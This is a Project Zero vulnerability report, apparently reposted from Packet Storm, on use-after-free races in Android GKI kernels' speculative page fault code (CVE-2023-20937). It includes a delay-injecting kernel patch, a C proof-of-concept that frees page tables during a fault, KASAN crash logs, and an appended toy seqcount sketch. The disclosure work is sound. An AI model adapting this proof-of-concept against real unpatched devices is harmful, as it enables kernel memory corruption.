
Android GKI Kernels Contain Broken Non-Upstream Speculative Page Faults MM Code

Android GKI kernels contain broken non-upstream Speculative Page Faults MM code that can lead to multiple use-after-free conditions.

Packet Storm
Android: GKI kernels contain broken non-upstream Speculative Page Faults MM code

A central recurring theme in Linux MM development is that contention on the mmap lock can have a big negative performance impact on multithreaded workloads: If one thread is holding the mmap lock in exclusive mode for an extended amount of time, other threads will block as soon as they try to handle a page fault. Therefore there is a bunch of work to downgrade exclusive lock holders to non-exclusive lock holders, shrink critical sections, and avoid holding the lock altogether in some cases.

One proposal to avoid holding the mmap lock in page fault handling is "Speculative page faults (SPF)"; here's a patch series from 2019 that had already gone through 11 rounds of review:
<https://lore.kernel.org/lkml/[email protected]/t/>

This patch series didn't land at the time; but something along those lines might land upstream in the next few years.

But for some reason, Android decided that they need speculative page faults immediately, and merged the patches that were discussed on the upstream mailing list into their GKI kernels. This is problematic for two reasons:

A) The MM code is complicated and easy to get wrong.
   If you run MM code that has not been through the fuzzing, testing and review that committed upstream code gets, there's a higher chance of undiscovered bugs.
B) The SPF patches **change the rules** that MM code has to follow, so now Android's version of MM has different rules than upstream MM.
   This means that any patches in vaguely related parts of upstream MM need to be checked by an Android engineer to see if they conflict with Android's special rules.

As far as I can tell, there are a bunch of memory safety bugs in the SPF version that is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):

1. handle_pte_fault() calls pmd_none() without protection against concurrent page table deletion, leading to UAF read.
2. do_anonymous_page() calls pte_alloc() without protection against concurrent page table deletion, leading to UAF write.
3. do_anonymous_page() calls pmd_trans_unstable() without protection against concurrent page table deletion, leading to UAF read.
4. do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates on a page table without protection against concurrent page table deletion, leading to use-after-union-change read+write in struct page (on the page table lock) and use-after-free read of a page table entry (resulting in bogus page* calculation).
5. do_wp_page() calls handle_userfault() without protection against concurrent userfaultfd_release(), leading to UAF reads of some flags from userfaultfd_ctx.
   I think back when the SPF series was posted upstream, there might have been sufficient protection against this (because ___handle_speculative_fault() bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd support was added, and ___handle_speculative_fault() doesn't bail on VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses userfaultfd_pte_wp() which reads flags from the VMA.
6. The way seqcounts are used to detect concurrent writers looks wrong.
   The seqcount API requires that only one writer at a time can be in a vm_write_begin() / vm_write_end() section, but these helpers are used in codepaths that only hold the mmap lock in shared mode, so there can be concurrent writers.
   As far as I can tell, this means that when there are an even number of concurrent writers, it will look as if there are no active writers.
   This _probably_ doesn't have much security impact because all of the places that do vm_write_begin() where concurrency would be an actual problem seem to hold the mmap lock in exclusive mode?

As an example, I tested issue 2.
To reproduce this easily, I patched an extra delay into the kernel:

```
diff --git a/mm/memory.c b/mm/memory.c
index 83b715ed65775..35ce412d0a965 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -84,6 +84,8 @@
 #include <asm/tlb.h>
 #include <asm/tlbflush.h>
 
+#include <linux/delay.h>
+
 #include "pgalloc-track.h"
 #include "internal.h"
 
@@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault *vmf)
        vm_fault_t ret = 0;
        pte_t entry;
 
+       if (strcmp(current->comm, "SLOWME") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {
+               pr_warn("%s: BEGIN DELAY 0x%lx\n", __func__, vmf->address);
+               mdelay(2000);
+               pr_warn("%s: END DELAY 0x%lx\n", __func__, vmf->address);
+       }
+
        /* File mapping without ->vm_ops ? */
        if (vmf->vma_flags & VM_SHARED)
                return VM_FAULT_SIGBUS;
```

Then, I ran this testcase on an x86 build with KASAN and CONFIG_PREEMPT:

```
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/mman.h>

// basic idea:
// delete the 1G-covering page table while do_anonymous_page() is at its entry
// point

#define VMA_ADDR ((void*)0x40000000UL)
#define VMA_SIZE (0x40000000UL)

// abort with an error message if a syscall wrapper returns -1
#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void *thread_fn(void *dummy) {
  // the patched kernel delays speculative faults of tasks named "SLOWME"
  SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
  // trigger the (delayed) speculative page fault
  *(volatile char *)VMA_ADDR;
  SYSCHK(prctl(PR_SET_NAME, "spfthread"));
  return NULL;
}

int main(void) {
  SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,
              MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));
  SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));

  // create anon_vma and page tables
  *(volatile char *)(VMA_ADDR+0x1000) = 1;

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  // let the other thread enter the delay, then free the page tables under it
  sleep(1);
  munmap(VMA_ADDR, VMA_SIZE);

  if (pthread_join(thread, NULL))
    errx(1, "pthread_join");
  return 0;
}
```

This first results in a UAF read of a PTE:

```
do_anonymous_page: BEGIN DELAY 0x40000000
do_anonymous_page: END DELAY 0x40000000
==================================================================
BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)
Read of size 8 at addr ffff88800f358000 by task SLOWME/724
CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
Call Trace:
dump_stack_lvl (lib/dump_stack.c:120)
[...]
print_address_description.constprop.0 (mm/kasan/report.c:257)
[...]
[...]
kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460)
[...]
handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)
[...]
___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106)
[...]
__handle_speculative_fault (mm/memory.c:5148)
[...]
do_user_addr_fault (arch/x86/mm/fault.c:1320)
[...]
exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518)
[...]
asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571)
RIP: 0033:0x55d52bfe41fb
```

Then pte_alloc() tries to lock the page table entry:

```
BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112)
Read of size 4 at addr ffff88801a730004 by task SLOWME/724
```

and after that, it will write into the freed page table.

From a security perspective, my recommendation is to fix this by reverting the speculative page fault patches out of the GKI trees, since I believe that such a divergence from upstream semantics is not maintainable.
Looking through the commit history of the AOSP android13-5.10 kernel branch also shows that a series of bugs have already been discovered that were introduced by SPF:

81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry
88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults
320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path
729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPF
c3cbea92297d5 ANDROID: mm: avoid writing to read-only elements
dd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handling
cf397c6c269ac ANDROID: mm: sync rss in speculative page fault path
531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page fault

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-02-01.

Please note that, according to our disclosure policy, if Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

Project Zero will consider new race conditions where the SPF fault path accesses page tables or the VMA without sufficient locking to be variants of this issue. This includes issues that are introduced after this bug is reported.

For more details, see https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.

Related CVE Number: CVE-2023-20937.

Found by: [email protected]
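
The seqcount concern in issue 6 of the report can be illustrated with a minimal, single-threaded C sketch. This is not the kernel's seqcount implementation and not Android's vm_write_begin() / vm_write_end() code: the names toy_seqcount, toy_write_begin(), toy_write_end(), toy_read_begin(), toy_read_retry() and toy_two_writers_look_idle() are hypothetical, and the two overlapping writers are modelled as interleaved calls rather than real threads. It only shows the parity argument: a counter that is incremented once on entry and once on exit is odd while exactly one writer is active, but becomes even again as soon as a second writer enters.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model of a sequence counter: an odd value means "a writer is active". */
struct toy_seqcount {
    unsigned int sequence;
};

/* Both helpers silently assume that the caller excludes all other writers. */
static void toy_write_begin(struct toy_seqcount *s) { s->sequence++; }
static void toy_write_end(struct toy_seqcount *s)   { s->sequence++; }

/* Reader side: snapshot the counter before doing speculative work. */
static unsigned int toy_read_begin(const struct toy_seqcount *s)
{
    return s->sequence;
}

/* A reader believes a writer is active only while the value is odd. */
static bool toy_writer_visible(const struct toy_seqcount *s)
{
    return s->sequence & 1;
}

/* Reader side: retry if the snapshot was odd or the counter has moved. */
static bool toy_read_retry(const struct toy_seqcount *s, unsigned int start)
{
    return (start & 1) || s->sequence != start;
}

/*
 * Interleave two writers that are not serialized against each other (as
 * could happen if both only held a lock in shared mode). Returns true if a
 * reader inspecting the counter while BOTH writers are still inside their
 * write sections would see "no active writer".
 */
static bool toy_two_writers_look_idle(void)
{
    struct toy_seqcount s = { 0 };
    bool hidden;

    toy_write_begin(&s);              /* writer A enters: 0 -> 1 (odd)  */
    assert(toy_writer_visible(&s));   /* a single writer is detected    */

    toy_write_begin(&s);              /* writer B enters: 1 -> 2 (even) */
    hidden = !toy_writer_visible(&s); /* both active, counter looks idle */

    toy_write_end(&s);                /* writer B leaves: 2 -> 3 */
    toy_write_end(&s);                /* writer A leaves: 3 -> 4 */
    return hidden;
}
```

In this model, a reader that takes its snapshot and performs its retry check entirely within the window where both writers are active sees an even, unchanged counter, so toy_read_retry() does not ask for a retry. Whether that window is reachable in practice depends on the locking held by the real callers, which is the open question the report raises.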
